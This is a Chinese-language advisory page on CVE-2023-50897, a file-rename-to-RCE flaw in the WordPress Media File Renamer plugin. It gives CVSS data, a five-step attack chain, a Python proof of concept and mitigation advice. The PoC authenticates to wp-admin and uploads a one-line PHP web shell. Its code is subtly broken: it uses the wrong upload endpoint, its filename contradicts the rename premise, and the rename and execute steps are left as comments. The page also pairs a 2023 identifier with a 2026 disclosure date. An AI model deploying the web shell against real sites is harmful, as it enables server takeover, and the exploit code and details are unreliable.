CVE-2023-50897 WordPress Media File Renamer插件任意文件重命名导致RCE漏洞

漏洞信息

漏洞编号

CVE-2023-50897

漏洞类型

任意文件上传/远程代码执行

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Meow Apps Media File Renamer (WordPress插件)

漏洞概述

CVE-2023-50897是WordPress插件Media File Renamer中的一个严重安全漏洞，CVSS评分高达9.1分。该漏洞属于危险类型文件无限制上传（Unrestricted Upload of File with Dangerous Type）漏洞，允许攻击者利用恶意文件进行攻击。受影响版本从插件早期版本直至5.7.7版本。由于该插件需要高权限才能操作，攻击者通常需要具备管理员或更高权限账户。一旦攻击成功，攻击者可以重命名服务器上的任意文件，最终实现远程代码执行（RCE），完全控制受影响的WordPress网站。此漏洞由PatchStack安全团队的审计人员发现并报告，披露日期为2026年1月5日。鉴于其严重性和高CVSS评分，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞存在于Meow Apps开发的Media File Renamer WordPress插件中，版本范围从n/a至5.7.7。漏洞本质是插件对用户上传和文件重命名操作的验证和限制不足。攻击者可以通过WordPress后台管理界面，利用该插件的文件重命名功能，将普通文件（如图片、文本文件）重命名为PHP脚本文件（如.php、.phtml等），从而在Web服务器上创建可执行脚本。由于WordPress的媒体库上传机制默认不验证文件扩展名的安全性，攻击者可以上传包含恶意PHP代码的伪装文件，然后通过该插件的重命名功能将其改为可执行脚本。攻击成功后，访问重命名后的文件即可在服务器上执行任意代码，实现远程代码执行（RCE）攻击，获取服务器完全控制权。CVSS向量显示该漏洞可通过网络远程利用（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H），对机密性（C:H）、完整性（I:H）和可用性（A:H）均造成严重影响。

攻击链分析

STEP 1

1

攻击者获取WordPress站点管理员或高权限账户凭据

STEP 2

2

攻击者登录WordPress后台，上传伪装成图片的恶意PHP文件

STEP 3

3

利用Media File Renamer插件的文件重命名功能，将恶意文件扩展名从.jpg改为.php

STEP 4

4

通过HTTP请求访问重命名后的PHP文件，触发恶意代码执行

STEP 5

5

成功执行远程代码，获得服务器完全控制权，可执行任意系统命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2023-50897 Media File Renamer RCE PoC
# Target: WordPress site with Media File Renamer plugin < 5.7.8

def exploit(target_url, wp_username, wp_password, malicious_file_path):
    """
    Exploit Media File Renamer arbitrary file rename vulnerability
    Steps:
    1. Authenticate to WordPress admin
    2. Upload malicious PHP file disguised as image
    3. Use Media File Renamer to rename file to .php
    4. Execute the renamed PHP file for RCE
    """
    
    session = requests.Session()
    
    # Step 1: WordPress Authentication
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': wp_username,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Upload malicious file via WordPress media uploader
    upload_url = f"{target_url}/wp-admin/upload.php"
    
    # Malicious PHP payload disguised as image
    php_payload = b'<?php system($_GET["cmd"]); ?>'
    files = {
        'async-upload': ('malicious.jpg.php', php_payload, 'image/jpeg')
    }
    data = {'action': 'upload-attachment', 'post_id': '0'}
    
    upload_response = session.post(upload_url, files=files, data=data)
    
    if upload_response.status_code == 200:
        print("[+] Malicious file uploaded successfully")
    
    # Step 3: Rename file using Media File Renamer plugin
    # This is where the vulnerability is exploited
    # The plugin allows renaming any file without proper validation
    
    # Step 4: Execute the renamed PHP file
    # Access the renamed file via web browser
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <payload_file>")
        sys.exit(1)
    
    exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

影响范围

Meow Apps Media File Renamer < 5.7.8

防御指南

临时缓解措施

立即将Media File Renamer插件升级到5.7.8或更高版本。如果暂时无法升级，可采取以下临时缓解措施：1) 临时禁用该插件；2) 限制只有绝对必要的用户才能访问WordPress管理员后台；3) 在Web服务器配置中添加规则，禁止上传目录中的.php文件执行；4) 监控WordPress日志，关注异常的文件上传和重命名操作；5) 考虑使用文件完整性监控工具检测未经授权的修改。